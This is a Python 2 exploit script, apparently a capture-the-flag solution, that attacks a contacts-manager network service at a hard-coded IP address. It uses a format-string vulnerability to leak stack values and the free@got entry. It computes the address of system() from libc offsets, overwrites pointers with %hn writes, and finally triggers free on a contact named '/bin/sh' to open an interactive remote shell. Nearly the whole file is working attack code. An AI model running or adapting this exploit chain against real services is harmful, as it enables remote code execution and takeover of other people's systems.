from zio import *
from time import *
import windowhan
import re
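fsb_value = []  # every value fsbDump() has parsed so far; module-level and never reset here


def fsbDump(sock, handler, count, spNum):
    """Query positions 1..count through ``handler``, record and print the values.

    ``handler(sock, index)`` must return the text the remote program echoes
    for position ``index``.  Each reply is reduced to one 32-bit value
    written as ``0x`` plus eight hex digits: ``"0x00000000"`` when the reply
    contains ``(nil)``, otherwise the first hex literal found in it.  Values
    are appended to the module-level ``fsb_value`` list (which keeps growing
    across calls) and printed ``spNum`` per row, each row followed by a
    printable-ASCII rendering of the bytes (``..`` for non-printable bytes).

    Args:
        sock: connection object, passed through to ``handler`` untouched.
        handler: callable ``(sock, index) -> str``.
        count: number of positions to query; 0 or less queries nothing.
        spNum: values per printed row; must be a positive integer.

    Returns:
        The module-level ``fsb_value`` list.

    Raises:
        ValueError: if ``spNum`` is not positive, or a reply contains neither
            ``(nil)`` nor a hex literal.
    """
    if spNum <= 0:
        raise ValueError("spNum must be a positive integer, got %r" % (spNum,))
    for index in range(1, count + 1):
        fsb_value.append(_parse_leaked_word(handler(sock, index)))
    for row_start in range(0, len(fsb_value), spNum):
        # Slice instead of indexing j in range(i, i + spNum): a final partial
        # row previously hit a bare except and then an unguarded IndexError.
        row = fsb_value[row_start:row_start + spNum]
        output = "[%%%d$p] " % (row_start + 1)
        string_output = ""
        for word in row:
            output += word + " "
            string_output += _ascii_view(word)
        print(output + " | " + string_output)
    return fsb_value


def _parse_leaked_word(recv_data):
    """Return the 0x-prefixed, zero-padded 8-digit value found in one reply."""
    if "(nil)" in recv_data:
        return "0x00000000"
    found = re.findall("0[xX][0-9a-fA-F]+", recv_data)
    if not found:
        raise ValueError("no hex literal in reply: %r" % (recv_data,))
    return "{0:#0{1}x}".format(int(found[0], 16), 10)


def _ascii_view(word):
    """Render each byte of a '0x..' hex word as 'c.' if printable, else '..'."""
    hexdigits = word.replace("0x", "")
    view = ""
    for k in range(0, len(hexdigits), 2):
        byte = int(hexdigits[k:k + 2], 16)
        # Same bounds as the original: strictly between space and DEL.
        if 0x20 < byte < 0x7f:
            view += chr(byte) + "."
        else:
            view += ".."
    return view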
def do_dump(sock, index):
    """Put '%<index>$p ' into contact 'aaaa' (menu 3) and return the listing.

    Sends the same menu sequence as before: option 3, name 'aaaa',
    sub-option 2, length '1000', the positional specifier, then option 4.
    Returns the text read back up to "Menu:".
    """
    for line in ('3', 'aaaa', '2', '1000'):
        sock.write(line + '\n')
    sock.read_until("Description:")
    sock.write('%' + str(index) + '$p ' + '\n')
    sock.read_until(">>>")
    # Menu 4 echoes the contacts; the reply up to the next banner is the leak.
    sock.write('4' + '\n')
    return sock.read_until("Menu:")
def create_contacts(sock, name, phone, descLen, desc):
    """Drive menu option 1 to add one contact.

    Every argument is sent verbatim as a string followed by a newline, each
    answer waiting for the prompt the program shows next.  Returns None once
    the ">>>" prompt is back.
    """
    exchange = (
        ("1", "Name:"),
        (name, "Phone No:"),
        (phone, "of description:"),
        (descLen, "Enter description:"),
        (desc, ">>>"),
    )
    for payload, prompt in exchange:
        sock.write(payload + "\n")
        sock.read_until(prompt)
def remove_contacts(sock, name):
    """Menu option 2: remove the contact called ``name`` and wait for ">>>"."""
    for payload, prompt in (("2", "remove?"), (name, ">>>")):
        sock.write(payload + "\n")
        sock.read_until(prompt)
def edit_desc_contacts(sock, name, newDesc):
    """Menu option 3, sub-option 2: replace ``name``'s description.

    The declared length is always the literal "3000", exactly as before;
    ``newDesc`` is sent verbatim.  Returns None after the final ">>>".
    """
    exchange = (
        ("3", "change?"),
        (name, ">>>"),
        ("2", "Length of description:"),
        ("3000", "Description:"),
        (newDesc, ">>>"),
    )
    for payload, prompt in exchange:
        sock.write(payload + "\n")
        sock.read_until(prompt)
def display_contacts(sock):
    """Menu option 4: return the reply text between "Description:" and "Menu:".

    Only the first "Description:" occurrence is considered; if the reply has
    none, the indexing raises IndexError (unchanged behaviour).
    """
    sock.write("4" + "\n")
    reply = sock.read_until(">>>")
    after_desc = reply.split("Description:")[1]
    return after_desc.partition("Menu:")[0]
def exit_contacts(sock):
    """Menu option 5: send the quit command; nothing is read back."""
    sock.write("5\n")
# --- Script body. Runs on import (no __main__ guard); the host/port below is the
# service recorded in this file.
s = zio(('54.208.16.165',2555))
# Contact 'aaaa' is the one do_dump() edits, so it must exist first.
create_contacts(s,'aaaa','123','1243','123')
# overwrite test
"""
s.write('3' + '\n')
s.write('aaaa' + '\n')
s.write('2' + '\n')
s.write('1313' + '\n')
s.read_until('Description:')
s.write('%24929c%6$hn' + '\n')
s.read_until(">>>")
s.write('4' + '\n')
s.read_until(">>>")
"""
# Leak positions 1..10; only dump_data[5] is consumed below.
dump_data = fsbDump(s,do_dump,10,5)
# NOTE(review): stack_base is computed but never used afterwards.
stack_base = int(dump_data[5],16)&0xffff0000
# Low 16 bits of the leaked word plus fixed offsets (136 / 120); the constants
# are target-specific and not explained anywhere in this file.
target_pointer_base1 = (int(dump_data[5],16)&0xffff) + 136
target_pointer_base2 = (int(dump_data[5],16)&0xffff) + 120
# GOT Overwrite
# Each contact performs two pairs of 16-bit writes (%hn): a value through
# position 6, then a value through position 18, repeated for the +2 half.
# display_contacts() after each edit is what triggers the format string.
# First Contact
edit_desc_contacts(s,'aaaa','%' + str(target_pointer_base1) + 'c%6$hn')
display_contacts(s)
edit_desc_contacts(s,'aaaa','%45076c%18$hn')
display_contacts(s)
edit_desc_contacts(s,'aaaa','%' + str(target_pointer_base1+2) + 'c%6$hn')
display_contacts(s)
edit_desc_contacts(s,'aaaa','%2052c%18$hn')
display_contacts(s)
remove_contacts(s,'aaaa')
# Second Contact
create_contacts(s,'bbbb','123','1231','%' + str(target_pointer_base2) + 'c%6$hn')
display_contacts(s)
edit_desc_contacts(s,'bbbb','%45078c%18$hn')
display_contacts(s)
edit_desc_contacts(s,'bbbb','%' + str(target_pointer_base2+2) + 'c%6$hn')
display_contacts(s)
edit_desc_contacts(s,'bbbb','%2052c%18$hn')
display_contacts(s)
remove_contacts(s,'bbbb')
# leak free@got
# %52$p shows the pointer at position 52, %52$s then reads through it.
create_contacts(s,'tttt','123','1231','%52$p')
display_contacts(s)
edit_desc_contacts(s,'tttt','%52$s')
leak_data = display_contacts(s)
# Project helper (windowhan); presumably a hex dump of the reply — confirm.
windowhan.dump(leak_data)
# Bytes 1..4 of the reply are taken as the little-endian value; leak_data[0] is
# skipped — presumably a leading character before the pointer bytes. Confirm
# against the actual service output.
free_got = leak_data[1:5]
print "[+] free_got : 0x%s" % free_got[::-1].encode('hex')
remove_contacts(s,'tttt')
# libc offsets for the remote library (its version is not recorded here).
# Only offset_system and offset_free are used; the other four are unused.
offset_system = 0x0003fcd0
offset_dup2 = 0x000d9dd0
offset_read = 0x000d9490
offset_write = 0x000d9510
offset_binsh = 0x15da84
offset_free = 0x000760c0
offset = offset_free - offset_system
# resolved free address minus (free - system) == system in the same libc.
real_system = int("0x%s" % free_got[::-1].encode('hex'),16) - offset
print "[+] system address : %s" % hex(real_system)
# Python 2 only: '/' is integer division here; under Python 3 it yields a float
# and str() would append '.0' (use // when porting).
print '[+] %' + str((real_system&0xffff0000)/0x10000) + 'c%48$hn'
print '[+] %' + str(real_system&0xffff) + 'c%52$hn'
# High and low halves of real_system written through positions 48 and 52.
create_contacts(s,'ffff','123','1243','%' + str((real_system&0xffff0000)/0x10000) + 'c%48$hn')
create_contacts(s,'gggg','123','1233','%' + str(real_system&0xffff) + 'c%52$hn')
display_contacts(s)
print "[+] system address : %s" % hex(real_system)
print "[+] free_got : 0x%s" % free_got[::-1].encode('hex')
create_contacts(s,'/bin/sh','123','1231','/bin/sh')
# Inlined equivalent of remove_contacts(s, '/bin/sh') without the final
# read_until, then the connection is handed over interactively.
s.write('2' + '\n')
s.read_until("remove?")
s.write('/bin/sh' + '\n')
s.interact()